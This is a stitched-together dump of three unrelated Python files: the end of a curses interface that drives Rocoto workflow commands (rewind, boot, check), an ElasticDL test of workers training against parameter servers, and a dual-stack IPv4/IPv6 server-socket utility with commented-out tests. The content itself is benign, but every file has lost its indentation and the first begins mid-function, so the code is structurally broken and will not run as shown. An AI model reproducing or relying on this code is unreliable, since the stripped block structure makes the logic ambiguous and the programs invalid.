else:
if execute_task in selected_tasks[execute_cycle]:
if len(selected_tasks[execute_cycle]) > 0:
selected_tasks[execute_cycle].remove(execute_task)
else:
selected_tasks[execute_cycle].append(execute_task)
update_pad = True
elif event == ord('c'):
if loading_check == True:
screen.addstr(mlines-2,0,'rocotocheck is already running                    ')
screen.refresh()
std_time.sleep(0.5)
screen.addstr(mlines-2,0,' '*100)
screen.refresh()
else:
loc = (0 if not loading_stat else 27)
screen.addstr(mlines-2,loc,'Running rocotocheck ')
screen.refresh()
params_check = (workflow_file, database_file, execute_task, execute_cycle, 'check')
process_get_rocoto_check = Process( target=get_rocoto_check, args=[params_check, queue_check] )
process_get_rocoto_check.start()
loading_check = True
current_check_time = time()
elif event == ord('f'):
log_file = ''
for find_task in tasks_ordered:
if find_task[0] == execute_task:
log_file = find_task[2].replace('CYCLE', execute_cycle[:-2] )
if check_file(log_file):
links = []
links.append(log_file)
try:
make_symlinks_in(links,EXPDIR,force=True)
except:
pass
elif event in (curses.KEY_ENTER, 10, 13):
if execute_metatask_check:
selected_tasks[execute_cycle] = list_selector( screen, selected_tasks[execute_cycle], metatask_list_of_selected_metatask )
screen.erase()
else:
if execute_task in selected_tasks[execute_cycle]:
if len(selected_tasks[execute_cycle]) > 0:
selected_tasks[execute_cycle].remove(execute_task)
else:
selected_tasks[execute_cycle].append(execute_task)
elif event == ord('r'):
screen.clear()
process = ''
if highlight_CYCLE:
screen.addstr('Are you sure you want to rewind all the tasks in the cycle %s by running:\n\n'%execute_cycle)
process = '-a'
#highlight_WORKFLOW = False
elif execute_metatask_check and len(selected_tasks[execute_cycle]) == 0:
for tasks in metatask_list_of_selected_metatask:
process += '-t ' + tasks+' '
screen.addstr('Are you sure you want to rewind all the tasks in the metatask (%s) by running:\n\n'%execute_task)
elif len(selected_tasks[execute_cycle]) != 0 or len(selected_meta_tasks[execute_cycle]) != 0:
if len(selected_tasks[execute_cycle]) != 0:
selected_tasks_string = ''
screen.addstr('Selected tasks:\n\n')
for tasks in selected_tasks[execute_cycle]:
selected_tasks_string += tasks+'\t'
process += '-t ' + tasks+' '
screen.addstr(selected_tasks_string+'\n\n')
if len(selected_meta_tasks[execute_cycle]) != 0:
selected_tasks_string = ''
screen.addstr('Selected %d entire meta-tasks and their tasks:\n\n'%len( selected_meta_tasks[execute_cycle]))
for meta_task_selected in selected_meta_tasks[execute_cycle]:
for tasks in metatask_list_by_name[meta_task_selected]:
selected_tasks_string += tasks+'\t'
process += '-t ' + tasks+' '
screen.addstr(selected_tasks_string+'\n\n')
screen.addstr('\nAre you sure you want to rewind all these selected tasks by running:\n\n')
elif len(selected_tasks[execute_cycle]) == 0:
process = '-t '+ execute_task
screen.addstr('Are you sure you want to rewind the single task %s by running:\n\n'%execute_task)
screen.addstr('rocotorewind -c %s -d %s -w %s %s\n\n'%(execute_cycle,basename(database_file),basename(workflow_file),process))
screen.addstr('Enter: <Y>es or <N>o',curses.A_BOLD)
while True:
event = screen.getch()
if event == ord('y') or event == ord('Y'):
params = (workflow_file, database_file, execute_cycle,process)
results = rocoto_rewind(params)
results_params = ('','','rewind',execute_cycle,'tasks')
try:
display_results(results,screen,results_params)
except:
screen.addstr('\n\nRewind of this job was successful but displaying the stdout failed\n')
screen.addstr('Output has been written out to the file rocotorewind_output.log\n')
screen.addstr('Press <ENTER> to continue')
with open('rocotorewind_output.log','a') as rocotorewind_logfile:
rocotorewind_logfile.write('\n\n'+results)
while True:
event = screen.getch()
if event in (curses.KEY_ENTER, 10, 13):
break
selected_tasks[execute_cycle] = []
break
elif event == ord('n') or event == ord('N'):
break
screen.clear()
update_pad = True
elif event == ord('U'):
selected_tasks[execute_cycle] = []
selected_meta_tasks[execute_cycle] = []
update_pad = True
elif event == ord('b'):
process = ''
screen.clear()
list_meta_tasks = ''
list_of_tasks = ''
boot_task_list = '' ; tasks_to_boot = []
boot_metatask_list = '' ; metatasks_to_boot = []
if highlight_CYCLE:
screen.addstr('You have selected to boot the entire cycle %s:\n\n'%execute_cycle,curses.A_BOLD)
metatasks_to_boot = metatask_list_per_cycle[cycle]
tasks_to_boot = tasks_in_cycle[cycle]
elif len(selected_tasks[execute_cycle]) != 0 or len(selected_meta_tasks[execute_cycle]) != 0:
screen.addstr('You have a list of selected tasks and/or metatasks to boot:\n\n',curses.A_BOLD)
metatasks_to_boot = selected_meta_tasks[execute_cycle]
tasks_to_boot = selected_tasks[execute_cycle]
elif execute_metatask_check:
screen.addstr('Are you sure you want to boot the entire meta task %s by running:\n\n'%execute_metatask)
metatasks_to_boot.append(execute_metatask)
elif len(selected_tasks[execute_cycle]) == 0:
tasks_to_boot.append(execute_task)
screen.addstr('Are you sure you want to boot the task %s by running rocotoboot with:'%execute_task)
else:
update_pad = True
continue
if len(metatasks_to_boot) > 0:
list_meta_tasks = ' '
screen.addstr('Metatasks selected in cycle:\n\n',curses.A_BOLD)
for meta_task in metatasks_to_boot:
list_meta_tasks += meta_task+' '
boot_metatask_list += meta_task+','
boot_metatask_list = boot_metatask_list[:-1]
screen.addstr( list_meta_tasks )
if len(tasks_to_boot) > 0:
list_of_tasks = ' '
screen.addstr('\n\nTasks selected in cycle:\n\n',curses.A_BOLD)
for a_task in tasks_to_boot:
list_of_tasks += a_task+' '
boot_task_list += a_task+','
boot_task_list = boot_task_list[:-1]
screen.addstr( list_of_tasks )
screen.addstr('\n\nAre you sure you want to boot all the tasks and/or metatasks in the cycle %s by running:\n\n'%execute_cycle,curses.A_BOLD)
if len(boot_metatask_list) != 0:
list_meta_tasks = '--metatasks '+"'"+boot_metatask_list+"'"
if len(boot_task_list) != 0:
list_of_tasks = ' --tasks '+"'"+boot_task_list+"'"
screen.addstr('rocotoboot -d %s -w %s %s\n\n'%(basename(database_file),basename(workflow_file),list_meta_tasks+list_of_tasks))
screen.addstr('Enter: <Y>es or <N>o',curses.A_BOLD)
while True:
event = screen.getch()
if event == ord('y') or event == ord('Y'):
params = (workflow_file, database_file, execute_cycle, boot_metatask_list, boot_task_list)
results = rocoto_boot(params)
display_results(results,screen,('','',execute_cycle,'rocotoboot_output'))
break
elif event == ord('n') or event == ord('N'):
break
screen.clear()
update_pad = True
elif event == ord('R'):
screen.addstr(mlines-2,0,'Running rocotorun and rocotostat ...'+' '*60,curses.A_BOLD)
params = (workflow_file, database_file)
rocoto_run(params)
update_pad = True
screen.clear()
if loading_stat == True:
screen.addstr(mlines-2,0,'rocotostat is already running'+' '*60)
screen.refresh()
std_time.sleep(0.5)
else:
start_time = 0
elif event == ord('/'):
curses.echo()
find_next = 1
screen.addstr(mlines-3,0,' '*100)
screen.refresh()
screen.addstr(mlines-3,0,'/')
screen.refresh()
search_string = screen.getstr(mlines-3,1,50)
break_twice = False
screen.addstr(mlines-3,0,' '*100)
screen.refresh()
for every_cycle in range(0,len(rocoto_stat)):
for line_number,line in enumerate(rocoto_stat[every_cycle]):
if search_string in line:
task = line_number
if num_lines < mlines:
pad_pos = 0
else:
pad_pos = task
update_pad = True
cycle = every_cycle
break_twice = True
break
if break_twice:
screen.clear()
break
else:
find_next = 1
elif (event == ord('n') or event == ord('N')) and len(search_string) != 0:
if event == ord('n'):
find_next += 1
else:
if find_next - 1 >= 1:
find_next -= 1
found_next = 0
break_twice = False
for every_cycle in range(0,len(rocoto_stat)):
for line_number,line in enumerate(rocoto_stat[every_cycle]):
if search_string in line:
found_next += 1
if find_next == found_next:
task = line_number
if num_lines < mlines:
pad_pos = 0
else:
pad_pos = task
update_pad = True
cycle = every_cycle
break_twice = True
break
if break_twice:
screen.clear()
break
if not break_twice:
find_next = 1
elif event == ord('F'):
for find_cycle in range(0,len(rocoto_stat)):
for lines in rocoto_stat[find_cycle]:
if 'RUNNING' in lines:
break
break
if find_cycle > 1:
cycle = find_cycle - 2
update_pad = True
elif event == ord('l'):
start_time -= stat_read_time_delay
elif event == ord('h'):
update_pad = True
help_screen(screen)
screen.clear()
current_time = time()
diff = current_time - start_time
if diff > stat_read_time_delay and not loading_stat:
start_time = current_time
if not use_multiprocessing:
params = (workflow_file, database_file, tasks_ordered, metatask_list,cycledef_group_cycles)
(rocoto_stat, tasks_ordered, metatask_list,cycledef_group_cycles) = get_rocoto_stat( params, Queue() )
stat_update_time = str(datetime.datetime.now()).rsplit(':',1)[0]
header = header_string
header = header.replace('t'*16,stat_update_time)
header = header.replace('pslot',PSLOT)
reduce_header_size = int((len(PSLOT)-len('PSLOT'))/2)
if reduce_header_size > 0:
header = header[:-reduce_header_size]
header = header[reduce_header_size:]
update_pad = True
screen.clear()
else:
loading_stat = True
screen.addstr(mlines-2,0,'Running rocotostat ')
params = (workflow_file, database_file, tasks_ordered, metatask_list,cycledef_group_cycles)
process_get_rocoto_stat = Process( target=get_rocoto_stat, args=[params, queue_stat] )
process_get_rocoto_stat.start()
if use_multiprocessing:
if process_get_rocoto_stat is not None:
if process_get_rocoto_stat.is_alive():
process_get_rocoto_stat.terminate()
if process_get_rocoto_check is not None:
if process_get_rocoto_check.is_alive():
process_get_rocoto_check.terminate()
#debug.close()
if __name__ == '__main__':
if not load_produtil_pythonpath():
print '\n\nCRITICAL ERROR: The produtil package could not be loaded from your system'
sys.exit(-1)
from produtil.fileop import remove_file
try:
signal.signal(signal.SIGWINCH, sigwinch_handler)
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
if sys.stdin.isatty():
curses.wrapper(main)
else:
screen = 'dummy'
main(screen)
remove_file(temp_workflow_file)
except KeyboardInterrupt:
print "Got KeyboardInterrupt exception. Exiting..."
sys.exit(-1)
|
worker_ps_interaction_test.py
|
import os
import unittest
from threading import Thread
import numpy as np
import tensorflow as tf
from elasticdl.proto import elasticdl_pb2
from elasticdl.python.common.args import parse_worker_args
from elasticdl.python.common.constants import DistributionStrategy
from elasticdl.python.common.hash_utils import int_to_id, string_to_id
from elasticdl.python.common.model_utils import get_model_spec
from elasticdl.python.ps.embedding_table import EmbeddingTable
from elasticdl.python.tests.test_utils import (
create_pserver,
get_frappe_dataset,
get_mnist_dataset,
get_random_batch,
)
from elasticdl.python.worker.worker import Worker
class WorkerPSInteractionTest(unittest.TestCase):
def setUp(self):
self._model_zoo_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "../../../model_zoo"
)
self._batch_size = 16
self._channels = []
self._pservers = []
self._workers = []
def tearDown(self):
for pserver in self._pservers:
pserver.server.stop(0)
def _create_pserver(self, model_def, num):
self._ports, self._channels, self._pservers = create_pserver(
self._model_zoo_path,
model_def,
grads_to_wait=1,
use_async=True,
num_ps_pods=num,
)
self._model_def = model_def
def _reset_pserver(self):
for ps in self._pservers:
ps.parameters.reset()
def _create_worker(self, worker_num):
for i in range(worker_num):
tf.keras.backend.clear_session()
tf.random.set_seed(22)
arguments = [
"--worker_id",
i,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
self._model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
worker = Worker(args, ps_channels=self._channels)
self._workers.append(worker)
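# _worker_train drives a single worker: on the first batch it builds the model and
# pulls the initial weights from the parameter servers, then for every batch it
# computes loss/gradients (eagerly or through the tf.function path) and reports the
# gradients back to the PS; every 20 steps it refreshes the model, evaluates accuracy
# on test_db and records a (loss, accuracy) tuple, stopping once stop_step is passed.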
def _worker_train(
self, worker_id, train_db, test_db, stop_step, use_tf_function=False
):
worker = self._workers[worker_id]
acc_meter = tf.keras.metrics.Accuracy()
worker_results = []
for step, (x, y) in enumerate(train_db):
if step == 0:
worker._run_model_call_before_training(x)
worker.get_model()
if use_tf_function:
w_loss, w_grads = worker.training_process_with_acceleration(
x, y
)
else:
w_loss, w_grads = worker.training_process_eagerly(x, y)
worker.report_gradient(w_grads)
if step % 20 == 0:
worker.get_model()
for (x, y) in test_db:
out = worker.forward_process(x)
if "mnist" in self._model_def:
acc_meter.update_state(tf.argmax(out, axis=1), y)
else:
out["probs"] = tf.reshape(out["probs"], [-1])
acc_meter.update_state(
tf.where(
out["probs"] < 0.5,
x=tf.zeros_like(y),
y=tf.ones_like(y),
),
y,
)
worker_results.append(
(float(w_loss.numpy()), float(acc_meter.result().numpy()))
)
acc_meter.reset_states()
if step > stop_step:
break
return worker_results
def _test_deepfm_train(self, num_ps, num_worker, stop_step):
model_def = "deepfm_functional_api.deepfm_functional_api.custom_model"
self._create_pserver(model_def, num_ps)
db, test_db = get_frappe_dataset(self._batch_size)
self._create_worker(num_worker)
threads = []
for w in range(num_worker):
t = Thread(
target=self._worker_train, args=(w, db, test_db, stop_step)
)
t.start()
threads.append(t)
for t in threads:
t.join()
def test_worker_pull_embedding(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
self._create_pserver(model_def, 2)
arguments = [
"--worker_id",
0,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
worker = Worker(args, ps_channels=self._channels)
# Test lookup embedding vectors that do not exist
layers = ["test-2", "test-2-slot"]
ids = [3, 5, 1, 6, 10, 2, 1, 2, 4, 7, 9]
embedding_table_args = [
(layers[0], 8, "uniform", False),
(layers[1], 8, 3.3, True),
]
# initialize embedding table object
for pserver in self._pservers:
for layer, table_args in zip(layers, embedding_table_args):
pserver.parameters.embedding_params[layer] = EmbeddingTable(
*table_args
)
result_dict = {}
for layer in layers:
embedding = worker.pull_embedding_vector(layer, ids)
result_dict[layer] = embedding
for layer in layers:
expected_result = []
for embedding_id in ids:
ps_id = int_to_id(embedding_id, len(self._pservers))
table = self._pservers[ps_id].parameters.embedding_params[
layer
]
expected_result.append(table.get([embedding_id]))
expected_result = np.concatenate(expected_result)
self.assertTrue(np.allclose(expected_result, result_dict[layer]))
def test_compare_onebatch_train(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
self._create_pserver(model_def, 2)
images, labels = get_random_batch(self._batch_size)
# TODO(yunjian.lmh): test optimizer wrapper
arguments = [
"--worker_id",
0,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
worker = Worker(args, ps_channels=self._channels)
worker._run_model_call_before_training(images)
worker.get_model()
w_loss, w_grads = worker.training_process_eagerly(images, labels)
worker.report_gradient(w_grads)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
(
model,
dataset_fn,
loss_fn,
opt_fn,
eval_metrics_fn,
prediction_outputs_processor,
create_data_reader_fn,
) = get_model_spec(
model_zoo=self._model_zoo_path,
model_def=model_def,
dataset_fn="dataset_fn",
model_params=None,
loss="loss",
optimizer="optimizer",
eval_metrics_fn="eval_metrics_fn",
prediction_outputs_processor="PredictionOutputsProcessor",
custom_data_reader="custom_data_reader",
)
with tf.GradientTape() as tape:
output = model.call(images, training=True)
labels = tf.reshape(labels, [-1])
loss = loss_fn(labels, output)
grads = tape.gradient(loss, model.trainable_variables)
opt_fn().apply_gradients(zip(grads, model.trainable_variables))
for v in model.trainable_variables:
ps_id = string_to_id(v.name, len(self._channels))
ps_v = self._pservers[ps_id].parameters.get_non_embedding_param(
v.name
)
np.testing.assert_array_equal(ps_v.numpy(), v.numpy())
def test_compare_mnist_train(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
self._create_pserver(model_def, 2)
db, test_db = get_mnist_dataset(self._batch_size)
stop_step = 20
self._create_worker(1)
worker_results = self._worker_train(
0, train_db=db, test_db=test_db, stop_step=stop_step
)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
acc_meter = tf.keras.metrics.Accuracy()
(
model,
dataset_fn,
loss_fn,
opt_fn,
eval_metrics_fn,
prediction_outputs_processor,
create_data_reader_fn,
) = get_model_spec(
model_zoo=self._model_zoo_path,
model_def=model_def,
dataset_fn="dataset_fn",
model_params=None,
loss="loss",
optimizer="optimizer",
eval_metrics_fn="eval_metrics_fn",
prediction_outputs_processor="PredictionOutputsProcessor",
custom_data_reader="custom_data_reader",
)
local_results = []
for step, (x, y) in enumerate(db):
with tf.GradientTape() as tape:
out = model.call(x, training=True)
ll = loss_fn(y, out)
grads = tape.gradient(ll, model.trainable_variables)
opt_fn().apply_gradients(zip(grads, model.trainable_variables))
if step % 20 == 0:
for (x, y) in test_db:
out = model.call(x, training=False)
acc_meter.update_state(tf.argmax(out, axis=1), y)
local_results.append(
(float(ll.numpy()), float(acc_meter.result().numpy()))
)
acc_meter.reset_states()
if step > stop_step:
break
for w, l in zip(worker_results, local_results):
self.assertTupleEqual(w, l)
def test_deepfm_train(self):
model_def = "deepfm_functional_api.deepfm_functional_api.custom_model"
self._create_pserver(model_def, 2)
db, test_db = get_frappe_dataset(self._batch_size)
self._create_worker(1)
worker_results = self._worker_train(
0, train_db=db, test_db=test_db, stop_step=100
)
acc = max([r[1] for r in worker_results])
self.assertLess(0.65, acc)
def test_deepfm_two_worker_train(self):
num_ps = 2
num_worker = 2
stop_step = 10
self._test_deepfm_train(num_ps, num_worker, stop_step)
def test_deepfm_four_worker_train(self):
num_ps = 4
num_worker = 1
stop_step = 10
self._test_deepfm_train(num_ps, num_worker, stop_step)
def test_restart_ps(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
num_data = 8
training_data = [
get_random_batch(self._batch_size) for _ in range(num_data)
]
workers = []
self._create_pserver(model_def, 2)
for w in range(2):
self._reset_pserver()
arguments = [
"--worker_id",
0,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
worker = Worker(args, ps_channels=self._channels)
workers.append(worker)
worker._run_model_call_before_training(training_data[0][0])
for i in range(num_data):
worker.get_model()
w_loss, w_grads = worker.training_process_eagerly(
training_data[i][0], training_data[i][1]
)
worker.report_gradient(w_grads)
if w == 1 and i == 3:
# Restart ps for the 2nd worker at i==3
# self._restart_pserver(model_def)
self._reset_pserver()
# `report_variable` will be called in `get_model` to
# initialize variables on ps with worker variables
worker.get_model()
# send the grads again as these grads are not applied
# on worker variables
worker.report_gradient(w_grads)
for var_name in workers[0]._non_embed_vars:
np.testing.assert_array_equal(
workers[0]._non_embed_vars[var_name].numpy(),
workers[1]._non_embed_vars[var_name].numpy(),
)
def test_train_acceleration_with_embedding(self):
model_def = "deepfm_functional_api.deepfm_functional_api.custom_model"
self._create_pserver(model_def, 2)
db, test_db = get_frappe_dataset(self._batch_size)
self._create_worker(1)
worker_results = self._worker_train(
0,
train_db=db,
test_db=test_db,
stop_step=100,
use_tf_function=True,
)
acc = max([r[1] for r in worker_results])
self.assertLess(0.65, acc)
if __name__ == "__main__":
unittest.main()
|
server_from_net.py
|
#!/usr/bin/env python
"""
Utility functions to create server sockets able to listen on both
IPv4 and IPv6.
"""
__author__ = "Giampaolo Rodola' <g.rodola [AT] gmail [DOT] com>"
__license__ = "MIT"
import os
import sys
import socket
import select
import contextlib
def has_dual_stack(sock=None):
"""Return True if kernel allows creating a socket which is able to
listen for both IPv4 and IPv6 connections.
If *sock* is provided the check is made against it.
"""
try:
socket.AF_INET6; socket.IPPROTO_IPV6; socket.IPV6_V6ONLY
except AttributeError:
return False
try:
if sock is not None:
return not sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
else:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
with contextlib.closing(sock):
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
return True
except socket.error:
return False
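# Usage sketch: has_dual_stack() probes the running kernel by opening a throwaway
# AF_INET6 socket, while has_dual_stack(sock=existing_sock) inspects the IPV6_V6ONLY
# option of an already-created socket instead.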
def create_server_sock(address, family=None, reuse_addr=None, queue_size=5,
dual_stack=has_dual_stack()):
"""Convenience function which creates a TCP server bound to
*address* and return the socket object.
Internally it takes care of choosing the right address family
(IPv4 or IPv6) depending on the host specified in *address*
(a (host, port) tuple).
If host is an empty string or None all interfaces are assumed
and if dual stack is supported by kernel the socket will be
able to listen for both IPv4 and IPv6 connections.
*family* can be set to either AF_INET or AF_INET6 to force the
socket to use IPv4 or IPv6. If not set it will be determined
from host.
*reuse_addr* tells the kernel to reuse a local socket in TIME_WAIT
state, without waiting for its natural timeout to expire.
If not set, it will default to True on POSIX.
*queue_size* is the maximum number of queued connections passed to
listen() (defaults to 5).
If *dual_stack* is True it will force the socket to listen on both
IPv4 and IPv6 connections (defaults to True on all platforms
natively supporting this functionality).
The returned socket can be used to accept() new connections as in:
>>> server = create_server_sock((None, 8000))
>>> while True:
... sock, addr = server.accept()
... # handle new sock connection
"""
AF_INET6 = getattr(socket, 'AF_INET6', 0)
host, port = address
if host == "":
# http://mail.python.org/pipermail/python-ideas/2013-March/019937.html
host = None
if host is None and dual_stack:
host = "::"
if family is None:
family = socket.AF_UNSPEC
if reuse_addr is None:
reuse_addr = os.name == 'posix' and sys.platform != 'cygwin'
err = None
info = socket.getaddrinfo(host, port, family, socket.SOCK_STREAM,
0, socket.AI_PASSIVE)
if not dual_stack:
# in case dual stack is not supported we want IPv4 to be
# preferred over IPv6
info.sort(key=lambda x: x[0] == socket.AF_INET, reverse=True)
for res in info:
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
if reuse_addr:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if af == AF_INET6:
if dual_stack:
# enable dual stack (clear IPV6_V6ONLY)
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
elif has_dual_stack(sock):
# disable dual stack (set IPV6_V6ONLY)
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
sock.bind(sa)
sock.listen(queue_size)
return sock
except socket.error as _:
err = _
if sock is not None:
sock.close()
if err is not None:
raise err
else:
raise socket.error("getaddrinfo returned an empty list")
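# Example sketch (hypothetical port): pin the address family to get an IPv4-only
# listener regardless of dual-stack support.
#   ipv4_srv = create_server_sock(('0.0.0.0', 8000), family=socket.AF_INET)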
class MultipleSocketsListener:
"""Listen on multiple addresses specified as a list of
(host, port) tuples.
Useful to listen on both IPv4 and IPv6 on those systems where
a dual stack is not supported natively (Windows and many UNIXes).
The returned instance is a socket-like object which can be used to
accept() new connections, as with a common socket.
Calls like settimeout() and setsockopt() will be applied to all
sockets.
Calls like gettimeout() or getsockopt() will refer to the first
socket in the list.
"""
def __init__(self, addresses, family=None, reuse_addr=None, queue_size=5):
self._socks = []
self._sockmap = {}
if hasattr(select, 'poll'):
self._pollster = select.poll()
else:
self._pollster = None
completed = False
try:
for addr in addresses:
sock = create_server_sock(addr, family=family,
reuse_addr=reuse_addr, queue_size=queue_size,
dual_stack=False)
self._socks.append(sock)
fd = sock.fileno()
if self._pollster is not None:
self._pollster.register(fd, select.POLLIN)
self._sockmap[fd] = sock
completed = True
finally:
if not completed:
self.close()
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def __repr__(self):
addrs = []
for sock in self._socks:
try:
addrs.append(sock.getsockname())
except socket.error:
addrs.append(())
return '<%s (%r) at %#x>' % (self.__class__.__name__, addrs, id(self))
def _poll(self):
"""Return the first readable fd."""
timeout = self.gettimeout()
if self._pollster is None:
fds = select.select(self._sockmap.keys(), [], [], timeout)
if timeout and fds == ([], [], []):
raise socket.timeout('timed out')
else:
if timeout is not None:
timeout *= 1000
fds = self._pollster.poll(timeout)
if timeout and fds == []:
raise socket.timeout('timed out')
try:
return fds[0][0]
except IndexError:
pass # non-blocking socket
def _multicall(self, name, *args, **kwargs):
for sock in self._socks:
meth = getattr(sock, name)
meth(*args, **kwargs)
def accept(self):
"""Accept a connection from the first socket which is ready
to do so.
"""
fd = self._poll()
sock = self._sockmap[fd] if fd else self._socks[0]
return sock.accept()
def filenos(self):
"""Return sockets's file descriptors as a list of integers.
This is useful with select().
"""
return list(self._sockmap.keys())
def getsockname(self):
"""Return first registered socket's own address."""
return self._socks[0].getsockname()
def getsockopt(self, level, optname, buflen=0):
"""Return first registered socket's options."""
return self._socks[0].getsockopt(level, optname, buflen)
def gettimeout(self):
"""Return first registered socket's timeout."""
return self._socks[0].gettimeout()
def settimeout(self, timeout):
"""Set timeout for all registered sockets."""
self._multicall('settimeout', timeout)
def setblocking(self, flag):
"""Set non/blocking mode for all registered sockets."""
self._multicall('setblocking', flag)
def setsockopt(self, level, optname, value):
"""Set option for all registered sockets."""
self._multicall('setsockopt', level, optname, value)
def shutdown(self, how):
"""Shut down all registered sockets."""
self._multicall('shutdown', how)
def close(self):
"""Close all registered sockets."""
self._multicall('close')
self._socks = []
self._sockmap.clear()
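# Minimal usage sketch (ephemeral ports; assumes both loopback addresses are available):
#   with MultipleSocketsListener([('127.0.0.1', 0), ('::1', 0)]) as listener:
#       conn, addr = listener.accept()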
# ===================================================================
# --- tests
# ===================================================================
# if __name__ == '__main__':
# import unittest
# import threading
# import errno
# import time
# try:
# from test.support import find_unused_port # PY3
# except ImportError:
# from test.test_support import find_unused_port # PY2
#
#
# class TestCase(unittest.TestCase):
#
# def echo_server(self, sock):
# def run():
# with contextlib.closing(sock):
# conn, _ = sock.accept()
# with contextlib.closing(conn) as conn:
# msg = conn.recv(1024)
# if not msg:
# return
# conn.sendall(msg)
#
# t = threading.Thread(target=run)
# t.start()
# time.sleep(.1)
#
# def test_create_server_sock(self):
# port = find_unused_port()
# sock = create_server_sock((None, port))
# with contextlib.closing(sock):
# self.assertEqual(sock.getsockname()[1], port)
# self.assertEqual(sock.type, socket.SOCK_STREAM)
# if has_dual_stack():
# self.assertEqual(sock.family, socket.AF_INET6)
# else:
# self.assertEqual(sock.family, socket.AF_INET)
# self.echo_server(sock)
# cl = socket.create_connection(('localhost', port), timeout=2)
# with contextlib.closing(cl):
# cl.sendall(b'foo')
# self.assertEqual(cl.recv(1024), b'foo')
#
# def test_has_dual_stack(self):
# # IPv4 sockets are not supposed to support dual stack
# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# with contextlib.closing(sock):
# sock.bind(("", 0))
# self.assertFalse(has_dual_stack(sock=sock))
#
# def test_dual_stack(self):
# sock = create_server_sock((None, 0))
# with contextlib.closing(sock):
# self.echo_server(sock)
# port = sock.getsockname()[1]
# cl = socket.create_connection(("127.0.0.1", port), timeout=2)
# with contextlib.closing(cl):
# cl.sendall(b'foo')
# self.assertEqual(cl.recv(1024), b'foo')
#
# sock = create_server_sock((None, 0))
# with contextlib.closing(sock):
# self.echo_server(sock)
# port = sock.getsockname()[1]
# if has_dual_stack():
# self.assertTrue(has_dual_stack(sock=sock))
# cl = socket.create_connection(("::1", port), timeout=2)
# with contextlib.closing(cl):
# cl.sendall(b'foo')
# self.assertEqual(cl.recv(1024), b'foo')
# else:
# self.assertFalse(has_dual_stack(sock=sock))
# try:
# socket.create_connection(("::1", port))
# except socket.error as err:
# if os.name == 'nt':
# code = errno.WSAECONNREFUSED
# else:
# code = errno.ECONNREFUSED
# self.assertEqual(err.errno, code)
# else:
# self.fail('exception not raised')
#
# # just stop server
# cl = socket.create_connection(("127.0.0.1", port), timeout=2)
# with contextlib.closing(sock):
# cl.sendall(b'foo')
# cl.recv(1024)
# if hasattr(unittest, 'skip'): # PY >= 2.7
# unittest.skip('dual stack cannot be tested as not '
# 'supported')
#
# # --- multiple listener tests
#
# def test_mlistener(self):
# port = find_unused_port()
# # v4
# sock = MultipleSocketsListener([('127.0.0.1', port), ('::1', port)])
# with contextlib.closing(sock):
# self.echo_server(sock)
# port = sock.getsockname()[1]
# cl = socket.create_connection(("127.0.0.1", port), timeout=2)
# with contextlib.closing(cl):
# cl.sendall(b'foo')
# self.assertEqual(cl.recv(1024), b'foo')
# # v6
# sock = MultipleSocketsListener([('127.0.0.1', port), ('::1', port)])
# with contextlib.closing(sock):
# self.echo_server(sock)
# port = sock.getsockname()[1]
# cl = socket.create_connection(("::1", port), timeout=2)
# with contextlib.closing(cl):
# cl.sendall(b'foo')
# self.assertEqual(cl.recv(1024), b'foo')
#
# def test_mlistener_timeout(self):
# sock = MultipleSocketsListener([('127.0.0.1', 0), ('::1', 0)])
# sock.settimeout(.01)
# self.assertRaises(socket.timeout, sock.accept)
#
# def test_mlistener_nonblocking(self):
# sock = MultipleSocketsListener([('127.0.0.1', 0), ('::1', 0)])
# sock.setblocking(False)
# try:
# sock.accept()
# except socket.error as err:
# if os.name == 'nt':
# code = errno.WSAEWOULDBLOCK
# else:
# code = errno.EAGAIN
# self.assertEqual(err.errno, code)
# else:
# self.fail('exception not raised')
#
# def test_mlistener_ctx_manager(self):
# with MultipleSocketsListener([("0.0.0.0", 0), ("::", 0)]) as msl:
# pass
# self.assertEqual(msl._socks, [])
# self.assertEqual(msl._sockmap, {})
#
# def test_mlistener_overridden_meths(self):
# with MultipleSocketsListener([("0.0.0.0", 0), ("::", 0)]) as msl:
# self.assertEqual(
# bool(msl.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)),
# os.name == 'posix')
# self.assertEqual(msl.getsockname()[0], "0.0.0.0")
# self.assertTrue(msl.filenos())
# msl.setblocking(True)
# msl.settimeout(2)
# self.assertEqual(msl.gettimeout(), 2)
# try:
# msl.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
# except socket.error:
# pass
#
# test_suite = unittest.TestSuite()
